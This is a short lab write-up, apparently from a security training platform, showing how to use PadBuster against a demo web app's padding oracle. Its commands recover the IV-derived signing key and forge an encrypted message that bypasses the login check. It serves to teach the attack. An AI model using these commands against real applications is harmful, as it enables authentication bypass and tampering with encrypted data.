Padding Oracle

In this lab, you will learn to perform a padding oracle attack on a vulnerable application to steal the signing key and also create a valid attacker-controlled encrypted message.

There is a web app that can perform various functions such as encrypting and decrypting strings.

The application can be attacked using the padbuster tool from https://github.com/AonCyberLabs/PadBuster.

# padbuster command
padbuster "http://demo.ine.local/echo?cipher=6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34e80" "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34e80" 16 -encoding 1

# encoding 1 is for lowercase hex

Becuase the IV is not known, the first block of the text is missing. Using padbuster running the below command will brute force the IV.

# what we know
6b664ef0359fe233e021ad36b12d8e32 -> ApplicationUsern
b8f1335522753d45174435c16b52dc2e -> ame=user&Passwor
5bbd4363b9d91d4c9100beae6ce34e80 -> d=sesame

padbuster "http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32" "6b664ef0359fe233e021ad36b12d8e32" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e" -noiv

#just need the first block
We use just the first block of the whole encrypted string - the one that was not decrypted
Next, we specify 16 bytes as the block size and lowercase hex encoding
-error tells the application what string to look for in the response page to treat it as the error (we could have identified that error message by requesting something like http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e5bbd4363b9d91d4c9100beae6ce34eff and the response would indicate of the invalid padding)
-noiv is used to get the intermediate value after decrypting the first block.

To get the signing key, need to XOR the hex of the ciphertext with the text of "ApplicationUsern"

Converting the result to ASCII reveals the key.

Using padbuster is it also possible to create a valid message that we control.

padbuster "http://demo.ine.local/check?cipher=6b664ef0359fe233e021ad36b12d8e32" "6b664ef0359fe233e021ad36b12d8e32" 16 -encoding 1 -error "ApplicationUsername missing" -prefix "6b664ef0359fe233e021ad36b12d8e32b8f1335522753d45174435c16b52dc2e" -plaintext "=xyz&ApplicationUsername=authorization&Password=bypass"

This gives us a new encrypted value.

When this is parsed by the application, the username and password could be bypassed.